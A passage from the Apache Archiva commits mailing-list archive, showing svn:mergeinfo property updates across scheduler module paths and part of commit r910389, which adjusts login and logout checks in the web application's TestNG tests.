/archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:825850-882054,887040-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java:825850-882054,887040-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:825850-882054,887040-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java:825850-882054,887040-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository:825850-882054,882055-909464* From [email protected] Tue Feb 16 03:58:01 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96870 invoked from network); 16 Feb 2010 03:58:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 03:58:01 -0000 Received: (qmail 20328 invoked by uid 500); 16 Feb 2010 03:58:00 -0000 Delivered-To: [email protected] Received: (qmail 20264 invoked by uid 500); 16 Feb 2010 03:58:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20255 invoked by uid 99); 16 Feb 2010 03:57:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 03:57:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 03:57:58 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 37FEE2388993; Tue, 16 Feb 2010 03:57:38 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910389 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test: ArchivaAdminTest.java UserRolesTest.java parent/AbstractArchivaTest.java Date: Tue, 16 Feb 2010 03:57:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 03:57:37 2010 New Revision: 910389 URL: http://svn.apache.org/viewvc?rev=910389&view=rev Log: check user is logged in at end of test Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArchivaAdminTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/UserRolesTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArchivaAdminTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArchivaAdminTest.java?rev=910389&r1=910388&r2=910389&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArchivaAdminTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ArchivaAdminTest.java Tue Feb 16 03:57:37 2010 @@ -62,8 +62,8 @@ String username = getProperty( "ADMIN_USERNAME" ); String mail = getProperty( "ADMIN_EMAIL" ); String password = getProperty( "ADMIN_PASSWORD" ); - submitAdminData( fullname, mail, password ); - assertAuthenticatedPage( username ); + submitAdminData( fullname, mail, password ); + assertUserLoggedIn( username ); submit(); clickLinkWithText( "Logout" ); } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/UserRolesTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/UserRolesTest.java?rev=910389&r1=910388&r2=910389&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/UserRolesTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/UserRolesTest.java Tue Feb 16 03:57:37 2010 @@ -34,8 +34,8 @@ createUser( username, fullname, getUserEmail(), getUserRolePassword(), true); deleteUser( username, fullname, getUserEmail() ); - clickLinkWithText( "Logout" ); - login( getAdminUsername() , getAdminPassword() ); + logout(); + login( getAdminUsername() , getAdminPassword() ); } @Test (dependsOnMethods = { "testBasicAddDeleteUser" } ) @@ -49,20 +49,20 @@ clickLinkWithText( "Edit Roles" ); checkUserRoleWithValue( fullname ); clickButtonWithValue( 